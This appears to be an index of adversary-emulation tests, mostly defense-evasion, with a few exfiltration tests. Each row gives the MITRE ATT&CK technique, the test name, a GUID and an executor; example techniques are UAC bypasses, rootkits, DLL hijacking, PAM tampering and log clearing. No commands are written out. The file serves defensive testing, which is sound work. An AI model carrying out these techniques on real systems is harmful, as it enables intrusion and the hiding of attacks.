exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1055.011 Process Injection: Extra Window Memory Injection 1 Process Injection via Extra Window Memory (EWM) x64 executable 93ca40d2-336c-446d-bcef-87f14d438018 powershell
3 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject 57ba4ce9-ee7a-4f27-9928-3c70c489b59d command_prompt
4 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
5 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 3 Rundll32 execute VBscript command using Ordinal number 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 command_prompt
6 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 4 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
7 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 5 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
8 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 6 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
9 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 7 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
10 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 8 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
11 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 9 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
12 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 10 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
13 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 11 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
14 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 12 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
15 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 13 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
16 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 14 Running DLL with .init extension and function 2d5029f0-ae20-446f-8811-e7511b58e8b6 command_prompt
17 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 15 Rundll32 execute command via FileProtocolHandler f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8 command_prompt
18 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 16 Rundll32 execute payload by calling RouteTheCall 8a7f56ee-10e7-444c-a139-0109438288eb powershell
19 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
20 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
21 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
22 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 sh
23 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 sh
24 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 sh
25 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
26 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
27 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
28 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 sh
29 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
30 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
31 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 10 chflags - Remove immutable file attribute 60eee3ea-2ebd-453b-a666-c52ce08d2709 sh
32 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 11 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
33 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 12 Chmod through c script (freebsd) da40b5fe-3098-4b3b-a410-ff177e49ee2e sh
34 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 13 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
35 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 14 Chown through c script (freebsd) eb577a19-b730-4918-9b03-c5edcf51dc4e sh
36 defense-evasion T1216.001 Signed Script Proxy Execution: Pubprn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
37 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
38 defense-evasion T1564.008 Hide Artifacts: Email Hiding Rules 1 New-Inbox Rule to Hide E-mail in M365 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9 powershell
39 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
40 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
41 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
42 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
43 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
44 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
45 defense-evasion T1036.007 Masquerading: Double File Extension 1 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
46 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
47 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
48 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
49 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
50 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
51 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
52 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
53 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
54 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
55 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
56 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
57 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
58 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
59 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
60 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
61 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
62 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
63 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
64 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
65 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
66 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
67 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
68 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
69 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key 85f3a526-4cfa-4fe7-98c1-dea99be025c7 powershell
70 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 25 Disable UAC notification via registry keys 160a7c77-b00e-4111-9e45-7c2a44eda3fd command_prompt
71 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 26 Disable ConsentPromptBehaviorAdmin via registry keys a768aaa2-2442-475c-8990-69cf33af0f4e command_prompt
72 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 27 UAC bypassed by Utilizing ProgIDs registry. b6f4645c-34ea-4c7c-98f2-d5a2747efb08 command_prompt
73 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
74 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
75 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
76 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
77 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
78 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
79 defense-evasion T1542.001 Pre-OS Boot: System Firmware 1 UEFI Persistence via Wpbbin.exe File Creation b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1 powershell
80 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
81 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
82 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
83 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
84 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 3 Masquerading cmd.exe as VEDetector.exe 03ae82a6-9fa0-465b-91df-124d8ca5c4e8 powershell
85 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
86 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
87 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
88 defense-evasion T1564 Hide Artifacts 4 Create and Hide a Service with sc.exe 333c7de0-6fbe-42aa-ac2b-c7e40b18246a command_prompt
89 defense-evasion T1564 Hide Artifacts 5 Command Execution with NirCmd 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be powershell
90 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
91 defense-evasion T1562.009 Impair Defenses: Safe Boot Mode 1 Safe Mode Boot 2a78362e-b79a-4482-8e24-be397bce4d85 command_prompt
92 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
93 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
94 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
95 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
96 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 5 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
97 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
98 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
99 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
100 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
101 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 2 rm -rf bd8ccc45-d632-481e-b7cf-c467627d68f9 sh
102 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 3 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
103 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 4 Truncate system log files via truncate utility 6290f8a8-8ee9-4661-b9cf-390031bf6973 sh
104 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 5 Truncate system log files via truncate utility (freebsd) 14033063-ee04-4eaf-8f5d-ba07ca7a097c sh
105 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 6 Delete log files via cat utility by appending /dev/null or /dev/zero c23bdb88-928d-493e-b46d-df2906a50941 sh
106 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 7 Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) 369878c6-fb04-48d6-8fc2-da9d97b3e054 sh
107 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 8 System log file deletion via find utility bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 sh
108 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 9 Overwrite macOS system log via echo utility 0208ea60-98f1-4e8c-8052-930dce8f742c sh
109 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 10 Overwrite FreeBSD system log via echo utility 11cb8ee1-97fb-4960-8587-69b8388ee9d9 sh
110 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 11 Real-time system log clearance/deletion 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c sh
111 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 12 Delete system log files via unlink utility 03013b4b-01db-437d-909b-1fdaa5010ee8 sh
112 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 13 Delete system log files via unlink utility (freebsd) 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 sh
113 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 14 Delete system log files using shred utility 86f0e4d5-3ca7-45fb-829d-4eda32b232bb sh
114 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 15 Delete system log files using srm utility b0768a5e-0f32-4e75-ae5b-d036edcf96b6 sh
115 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 16 Delete system log files using OSAScript 810a465f-cd4f-47bc-b43e-d2de3b033ecc sh
116 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 17 Delete system log files using Applescript e62f8694-cbc7-468f-862c-b10cd07e1757 sh
117 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 18 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
118 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 19 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
119 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 20 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
120 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
121 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
122 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
123 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
124 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
125 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
126 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
127 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
128 defense-evasion T1574.001 Hijack Execution Flow: DLL 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
129 defense-evasion T1574.001 Hijack Execution Flow: DLL 2 Phantom Dll Hijacking - WinAppXRT.dll 46ed938b-c617-429a-88dc-d49b5c9ffedb command_prompt
130 defense-evasion T1574.001 Hijack Execution Flow: DLL 3 Phantom Dll Hijacking - ualapi.dll 5898902d-c5ad-479a-8545-6f5ab3cfc87f command_prompt
131 defense-evasion T1574.001 Hijack Execution Flow: DLL 4 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
132 defense-evasion T1574.001 Hijack Execution Flow: DLL 5 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
133 defense-evasion T1574.001 Hijack Execution Flow: DLL 6 DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE c095ad8e-4469-4d33-be9d-6f6d1fb21585 powershell
134 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
135 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
136 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
137 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
138 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
139 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
140 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 6 SubInAcl Execution a8568b10-9ab9-4140-a523-1c72e0176924 command_prompt
141 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
142 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
143 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
144 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
145 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
146 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
147 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
148 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
149 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
150 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
151 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
152 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
153 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 2 Install Additional Authentication Packages 91580da6-bc6e-431b-8b88-ac77180005f2 powershell
154 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
155 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
156 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
157 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
